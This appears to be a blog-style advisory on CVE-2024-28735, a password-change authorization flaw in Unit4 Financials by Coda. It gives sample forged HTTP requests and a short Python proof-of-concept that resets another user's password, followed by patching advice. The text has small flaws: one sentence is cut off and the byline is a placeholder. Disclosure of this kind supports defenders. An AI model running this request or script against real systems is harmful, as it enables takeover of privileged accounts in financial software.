CVE-2024-28735 - How an Auth Bypass in Unit4 Financials Lets Users Change Any Password

Published: June 2024

Author: [Your Name]

Unit4 Financials by Coda is well-known accounting and finance software used by businesses around the world. In March 2024, a serious security vulnerability was discovered by researchers, now tracked as CVE-2024-28735. This bug is an “improper access control” issue — meaning, with the right kind of request, any user with a valid login can change the password of any other user account on the system.

Let’s take a look at what this means, how it works, and what you should do to protect your company.

What is CVE-2024-28735?

CVE-2024-28735 impacts Unit4 Financials by Coda *for all versions prior to 2023Q4*. The vulnerability lies in the application’s user management functionality, where insufficient authorization checks are performed when requests are sent to update user passwords.

Simply put: If you can log in as any user, you can send a specific request to change the password of any other user in the application — even privileged accounts.

Official advisory:
- Unit4 Security Notice
- NVD Entry for CVE-2024-28735
- VulDB entry

Understanding the Flaw

Let’s go a level deeper. Under the hood, the web application has a password update API endpoint. Normally, changing a user’s password should only be possible for:

Example Scenario

Alice, a regular user, logs in. She inspects the network traffic and sees a POST request when she changes her own password:

POST /api/users/change-password HTTP/1.1
Host: unit4.example.com
Content-Type: application/json
Authorization: Bearer <Alice’s token>

{
  "username": "alice",
  "password": "oldpass",
  "new_password": "aliceSecureNew!"
}

Alice then changes "username": "alice" to "username": "admin1" or any other valid user

POST /api/users/change-password HTTP/1.1
Host: unit4.example.com
Content-Type: application/json
Authorization: Bearer <Alice’s token>

{
  "username": "admin1",
  "password": "doesnotmatter",
  "new_password": "hacked!456"
}

If the system doesn’t do proper permission checks, this request *succeeds* — and Alice resets the password for the admin account.

Proof-of-Concept (PoC) Exploit

Below is a demonstration using Python with the requests library. This is for educational purposes only!

import requests

url = "https://your.unit4.instance/api/users/change-password";
headers = {
    "Authorization": "Bearer <valid_user_token>",
    "Content-Type": "application/json"
}
data = {
    "username": "victim_user",
    "password": "irrelevant",
    "new_password": "CompromisedPass123!"
}

response = requests.post(url, json=data, headers=headers)
print(response.status_code)
print(response.text)

Replace <valid_user_token> with a token for any authenticated, low-privilege user, and victim_user with the username of the account you wish to compromise.

*In the vulnerable system, this changes the password for victim_user.*

Upgrade immediately to Unit4 Financials by Coda 2023Q4 or later.

- Official patch notes: Unit4 Release Notes

More about CVE-2024-28735

- NVD details
- Unit4 customer portal security advisory

In Summary

If you’re using Unit4 Financials by Coda prior to 2023Q4, apply the update *now*. CVE-2024-28735 makes it far too easy for any user to take over any account on your system — including the most sensitive users. Take action before someone else does.


*Stay safe, patch early, and keep your financial data secure!*

Timeline

Published on: 03/20/2024 15:15:07 UTC
Last modified on: 08/01/2024 13:49:15 UTC